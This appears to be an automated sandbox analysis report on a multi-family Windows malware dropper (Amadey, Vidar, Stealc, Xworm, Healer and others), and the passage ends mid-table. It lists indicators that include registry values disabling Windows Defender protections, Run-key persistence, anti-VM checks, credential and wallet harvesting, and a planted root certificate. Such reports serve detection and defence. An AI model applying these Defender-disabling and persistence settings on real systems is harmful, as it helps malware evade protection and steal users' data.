Analysis Overview
SHA256
d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e
Threat Level: Known bad
The file d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e was found to be: Known bad.
Malicious Activity Summary
Detects Healer an antivirus disabler dropper
Detect Vidar Stealer
Modifies Windows Defender DisableAntiSpyware settings
Litehttp family
Xworm family
Amadey
Detect Xworm Payload
Healer family
Modifies Windows Defender notification settings
Stealc family
Modifies Windows Defender Real-time Protection settings
Healer
SystemBC
Systembc family
Xworm
LiteHTTP
Amadey family
Modifies Windows Defender TamperProtection settings
Vidar family
Vidar
Stealc
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Uses browser remote debugging
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Checks BIOS information in registry
Reads data files stored by FTP clients
.NET Reactor proctector
Checks computer location settings
Unsecured Credentials: Credentials In Files
Reads user/profile data of web browsers
Identifies Wine through registry keys
Loads dropped DLL
Reads user/profile data of local email clients
Drops startup file
Windows security modification
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Enumerates processes with tasklist
Suspicious use of SetThreadContext
AutoIT Executable
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Windows directory
Browser Information Discovery
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Program crash
Unsigned PE
Modifies registry class
Scheduled Task/Job: Scheduled Task
Checks processor information in registry
Suspicious use of SendNotifyMessage
Delays execution with timeout.exe
Enumerates system info in registry
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Kills process with taskkill
Suspicious use of SetWindowsHookEx
Uses Task Scheduler COM API
Modifies data under HKEY_USERS
Suspicious use of FindShellTrayWindow
Modifies system certificate store
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-03-05 22:28
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-03-05 22:28
Reported
2025-03-05 22:30
Platform
win7-20240903-en
Max time kernel
146s
Max time network
151s
Command Line
Signatures
Amadey
Amadey family
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Healer an antivirus disabler dropper
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Healer
Healer family
LiteHTTP
Litehttp family
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe | N/A |
Modifies Windows Defender TamperProtection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe | N/A |
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications | C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe | N/A |
Stealc
Stealc family
SystemBC
Systembc family
Vidar
Vidar family
Xworm
Xworm family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107370101\460d9c14c9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107380101\69c80032ec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
.NET Reactor proctector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107370101\460d9c14c9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107380101\69c80032ec.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107370101\460d9c14c9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107380101\69c80032ec.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107370101\460d9c14c9.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107380101\69c80032ec.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe | N/A |
Loads dropped DLL
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\69c80032ec.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107380101\\69c80032ec.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\63f1932a62.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107390101\\63f1932a62.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\8e275fbb94.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107400101\\8e275fbb94.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\8QpbZ8u9\\Anubis.exe\"" | C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\460d9c14c9.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107370101\\460d9c14c9.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates processes with tasklist
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107370101\460d9c14c9.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107380101\69c80032ec.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2752 set thread context of 2608 | N/A | C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe | C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe |
| PID 2052 set thread context of 2044 | N/A | C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe | C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107380101\69c80032ec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107370101\460d9c14c9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107390101\63f1932a62.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language | C:\Users\Admin\AppData\Local\Temp\10107390101\63f1932a62.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage | C:\Users\Admin\AppData\Local\Temp\10107390101\63f1932a62.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Delays execution with timeout.exe
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498